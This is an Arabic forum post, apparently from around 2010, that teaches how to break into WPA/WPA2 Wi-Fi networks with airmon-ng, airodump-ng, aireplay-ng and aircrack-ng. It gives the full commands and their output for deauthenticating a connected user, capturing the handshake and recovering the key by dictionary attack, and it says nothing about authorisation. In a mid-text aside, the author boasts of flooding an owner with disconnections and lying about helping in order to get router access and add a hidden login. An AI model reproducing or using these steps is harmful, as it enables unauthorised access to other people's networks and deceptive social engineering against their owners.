[align=center]السلام عليكم ورحمة الله وبركاته
أضع بين أيديكم .. شرح كيفية كسر حماية وايرلس نوع التشفير اللي فيها
wpa/wpa2
وهو يعتبر من اقوى الحمايات .. والذي يعتمد على فصل أحد المشتركين او المتصلين بالراوتر ثم الحصول على هاند شيك...
يعني أن نحصل على ملف كاب الذي يتم تخمين كلمة السر الموجودة فيه
الأدوات المستخدمة ..
airodump
aireplay
aircrack
والعمل تحت نظام لينوكس توزيعه باك تراك4
لأنهم موجودين فيه وما في داعي نزلهم
الأن أكثر المستخدمين هم لتوزيعه أوبونتو .. أقول نزلو حزمة aircrack
لكن يختلف مكان الإستخدام من الشيل لأن ممكن واحد وضعها في مكان وهو عم ينفذ الأمر من مكان .. وتنهال الأسئلة علي .. انه لم يشتغل .. أقول ان لم تعرف كيف تنزل .. ومن أين تكتب الأوامر . . تعلم على المبادىء بعدين لكل حادث حديث
قد يسأل البعض كيف بعرفها .. وبميزها من web أقول
أولا يجب معرفة اسم كرت النت وورك الهوائي الموجود عندك ولمعرفه ذلك تكتب في الشيل
iwconfig
اللي مكتوب بجنبه
no wireless extensions.
يعني مش كرت وايرلس
اما المكتوب بجنبه مثل هالكلام
كود:
wlan0 IEEE 802.11bg ESSID:""
Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
عندي اسمه wlan0 قد يكون عند الغير eth1 او حسب اسمه
يكون هو الكرت .. قد نجد أكثر من واحد .. لأن الشخص ممكن يكون عنده أكثر من كرت بجهازه هو مركبهم ..
ولمستخدمي اللابتوبات .. أكيد يوجد كرت هوائي .. ولمعرف اسمه نفعل مثل فوق
الأن عرفنا اسم الكرت الهوائي ..
أول شي نشغل الكرت على المونيتور .. يعني المراقبة
airmon-ng start wlan0
قد يشتغل المونيتور ليس على نفس الإسم
كود:
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]air
(monitor mode enabled on mon0)
كما قال هنا أنه تم تفعيل المراقبة على اسم
mon0
هنا كل واحد لازم يعرف
وأنا سأكمل حسب الموجود عندي
بعد هذا .. وأهم شيئ .. هو أن يكون الكرت عندك يدعم الحقن .. يعني يحقن باكيتس
وهو ضروري جدا .. ولمعرف ذلك أكتب
بعدين
airodump-ng mon0
حتى نشوف الراوترات المحيطة بنا
كود:
CH 8 ][ Elapsed: 12 s ][ 2010-03-12 10:39
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1F:9F:D3:1F:EB -48 24 0 0 1 54 WPA2 CCMP PSK ThomsonE2A46B
BSSID STATION PWR Rate Lost Packets Probes
00:1F:9F:D3:1F:EB 00:13:CE:4F:B5:51 -49 0 -24 38 20 ThomsonE2A46B
الأن كما نلاحظ أن نوع الحمايه هو wpa2 psk
pre shared key
يعني لازم يتم فصل مستخدم حتى نحصل على ملف الكاب لنكسره فيما بعد
والمهم للكسر هو معرفة القناة
CH .. channel اللي شغالة عليها الراوتر
هنا هي القناة 1
كم نلاحظ تحت CH
وأهم شي .. هو الماك أدريس للراوتر وللمستخدم
الان نوقف المراقبة على أسماء الكروت .. (يمكننا أن نعمل مراقبة ,, لكن رح يطلع اسم كرت غير .. حست نوعية الكرت .. وهو هل حديث .. لأنه بهالحالة يقدم خصائص متميزة)
المهم سأشرح الأسهل والموجود عند الجميع
كود:
airmon-ng stop mon0
airmon-ng stop wlan0
root@bt:~# airmon-ng stop mon0
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
mon0 Atheros ath5k - [phy0] (removed)
root@bt:~# airmon-ng stop wlan0
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
(monitor mode disabled)
هكذا نكون وقفنا المراقبة
الأن نعيد تشغيلها لكن على القناة الخاصة بالراوتر اللي يجب أن نكسرهاوهي هنا رقم 1
كود:
airmon-ng start wlan0 1
root@bt:~# airmon-ng start wlan0 1
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
(monitor mode enabled on mon0)
اخبرنا أن المراقبة شغالة على mon0
بعد هذا .. وأهم شيئ .. هو أن يكون الكرت عندك يدعم الحقن .. يعني يحقن باكيتس
وهو ضروري جدا .. ولمعرف ذلك أكتب
كود:
aireplay-ng -9 -e ThomsonE2A46B -a 00:1F:9F:D3:1F:EB mon0
3:1F:EB mon0
-9 لمعرفة إذا يدعم الحقن
-e وبعدها اسم الراوتر
-a وبعدها الماك ادريس للراوتر
mon0 اسم الكرت اللي شغلنا المراقبة عليه
نلاحظ شو يطلعلنا
كود:
11:10:48 Waiting for beacon frame (BSSID: 00:1F:9F:D3:1F:EB) on channel 1
11:10:48 Trying broadcast probe requests...
11:10:48 Injection is working!
11:10:49 Found 1 AP
11:10:49 Trying directed probe requests...
11:10:49 00:1F:9F:D3:1F:EB - channel: 1 - 'ThomsonE2A46B'
11:10:49 Ping (min/avg/max): 1.249ms/3.204ms/6.293ms Power: -41.93
11:10:49 30/30: 100%
نلاحظ
11:10:48 Injection is working!
11:10:49 30/30: 100%
يعني كل شي شغال وتمام
ملاحظة .. يجب أن تكون قريب كفاية من الراوتر ..او عندك مقـوي اشارة
الأن لمراقبة الراوتر ومستخدميها نكتب
كود:
airodump-ng -c 1 --bssid 00:1F:9F:D3:1F:EB -w ttt mon0
-c 1 يعني القناة 1 وهي الموجود عليها الراوتر
--bssid وبعدها الماك أدريس للراوتر
-w وبعدها اسم الملف الذي سيخرج للحصول على شبك وهاند شيك
mon0 اسم الكرت اللي تم عليه المراقبة
نلاحظ
كود:
CH 1 ][ Elapsed: 1 min ][ 2010-03-12 10:50
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1F:9F:D3:1F:EB -44 100 1120 35 0 1 54 WPA2 CCMP PSK ThomsonE2A46B
BSSID STATION PWR Rate Lost Packets Probes
00:1F:9F:D3:1F:EB 00:13:CE:4F:B5:51 -47 1 -36 0 785
الأن المراقبة شغالة .. وأذكر انه مهم ان يظهر على اليمين في الأعلي
handshake
الأن للحصول على هاند شيك يجب فصل المستخدم على الراوتر
فنستخدم هذا الأمرفي شاشة شيل تانية
كود:
aireplay-ng -0 1 -a 00:1F:9F:D3:1F:EB -c 00:13:CE:4F:B5:51 mon0
-0 لعمل deauthentication والرقم 1 هو يعني مرة واحدة .. اننا سنفصل مرة واحدة
(ملاحظة .. يمكننا استخدام الهندسة الإجتماعية ان لم ننجح بمعرفة كلمة السر .. وهو ان نفصل حوالي مليون مرة .. ونقول لصاحب الشكبة اننا نعرف الحل ويمكننا المساعده .. لكن يجب معرفة كلمة السر والدخول للراوتر ومن هالحكي الكذب ههه
هو يوثق فينا .. وعندها ندخل للراوتر .. نضيف مستخدم دخول مع كلمة سر خاصة به ونغير اللي بدنا اياه هههه .. طريقة نافعه .. ونجحت معي )
-a الماك أدريس للراوتر
-c الماك أدريس للمستخدم اللي نريد فصله
mon0 اسم الكرت اللي نراقب عليه ..
نلاحظ شو يطلعلنا
كود:
root@bt:~# aireplay-ng -0 1 -a 00:1F:9F:D3:1F:EB -c 00:13:CE:4F:B5:51 mon0
10:56:20 Waiting for beacon frame (BSSID: 00:1F:9F:D3:1F:EB) on channel 1
10:56:21 Sending 64 directed DeAuth. STMAC: [00:13:CE:4F:B5:51] [16|66 ACKs]
بعد تطبيق الأمر .. نكون فصلنا مستخدم وقطعنا عنه الإتصال ثم عاد ودخل ونكون نحن حصلنا على ملف الكاب اللي فيه كلمة السر ويجب تخمينها ..
كود:
CH 1 ][ Elapsed: 6 mins ][ 2010-03-12 10:57 ][ WPA handshake: 00:1F:9F:D3:1F:EB
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1F:9F:D3:1F:EB -44 100 4060 115 2 1 54 WPA2 CCMP PSK ThomsonE2A46B
BSSID STATION PWR Rate Lost Packets Probes
00:1F:9F:D3:1F:EB 00:13:CE:4F:B5:51 -42 54 - 2 0 2976
نلاحظ على اليمين في الأعلى
WPA handshake: 00:1F:9F:D3:1F:EB
وهي مهمة .. وتعني أنه تم الفصل
الأن حصلنا على ملف الكاب .. ويمكننا أنو نوقف المراقبة الأن
يعني نوقف ال
airodump-ng
ما عدنا محتاجينها
الأن جاء الدور المهم وهو تخمين كلمة السر(أقول تخمين لأن هذه الحماية بدها تخمين .. مش متل الويب نجمع باكيتس ونكسرهم)
نستخدم الأن ونكتب
كود:
aircrack-ng -w passowrds.lst -b 00:1F:9F:D3:1F:EB tt*.cap
-w بعدها مكان وجود ملف الباسووردات
-b الماك أدريس للراوتر
tt*.cap هو اسم ملف الكاب
وهنا أعود وأذكر أنه نحن الأن نخمن كلمة السر من ملف فيه باسووردات كثيرة
بمعنى أخر أنه يجب ان تكون كلمة السر موجودة داخل الملف حتى يتم اكتشافها .. وهنا تعتمد على مدى قوة وكبر ملف الباسووردات
وسأنفذ الأمر عندي
كود:
aircrack-ng -w /pentest/passwords/wordlists/bt4-password.txt -b 00:1F:9F:D3:1F:EB tt*.cap
ونلاحظ أنه تم معرفة كلمة السر
كود:
Aircrack-ng 1.0 r1668
[00:00:00] 12 keys tested (235.19 k/s)
KEY FOUND! [ alaa123123 ]
Master Key : B1 67 C3 CE 94 25 20 85 7F EC E6 16 30 8E 61 26
4A 36 6D A6 0A 22 43 19 79 E4 09 A7 6C 8F 62 A8
Transient Key : E8 52 16 BB C0 3D 48 E3 C8 D0 90 10 6E 76 68 11
FE 6F F6 9D EE 1F AE EF D9 0F 44 0A 4F 11 14 F7
1A 47 5E 29 FA 7B CD 5A 81 47 8A EA 0B B1 C3 B9
D3 C7 C2 41 73 2A 8B 6A 29 8F C9 AC CF B1 A3 A3
EAPOL HMAC : 3F EB 20 C8 BD C5 35 7F F4 1A 42 C2 6B 45 58 44
والكلمة هي
alaa123123
كنت بدي سوي الشرح فيديو .. لكن قلت ما في داعي .. وعلى فكر الدروس الكتابية أفضل
إعادة سريعه ومختصرة
1- aireplay-ng -9 -e ThomsonE2A46B -a 00:1F:9F:D3:1F:EB mon0
لمعرفة هل يدعم الحقن
2- airodump-ng -c 1 --bssid 00:1F:9F:D3:1F:EB -w ttt mon0
لمراقبة الراوتر
3- aireplay-ng -0 1 -a 00:1F:9F:D3:1F:EB -c 00:13:CE:4F:B5:51 mon0
لفصل مستخدم
4- aircrack-ng -w passowrds.lst -b 00:1F:9F:D3:1F:EB tt*.cap
لعمل تخمين وإيجاد كلمة السر ..
وبالنهايةاذكر على انه يجب أن تكون كلمة السر موجودة بالملف وإلا لن يجدها لأننا هنا نعتمد على التخمين وليس الكسر [/align]
;sv jatdv ,hdvgs ugdih plhdm k,u wpaLwpa2 fhgjtwdg hgllg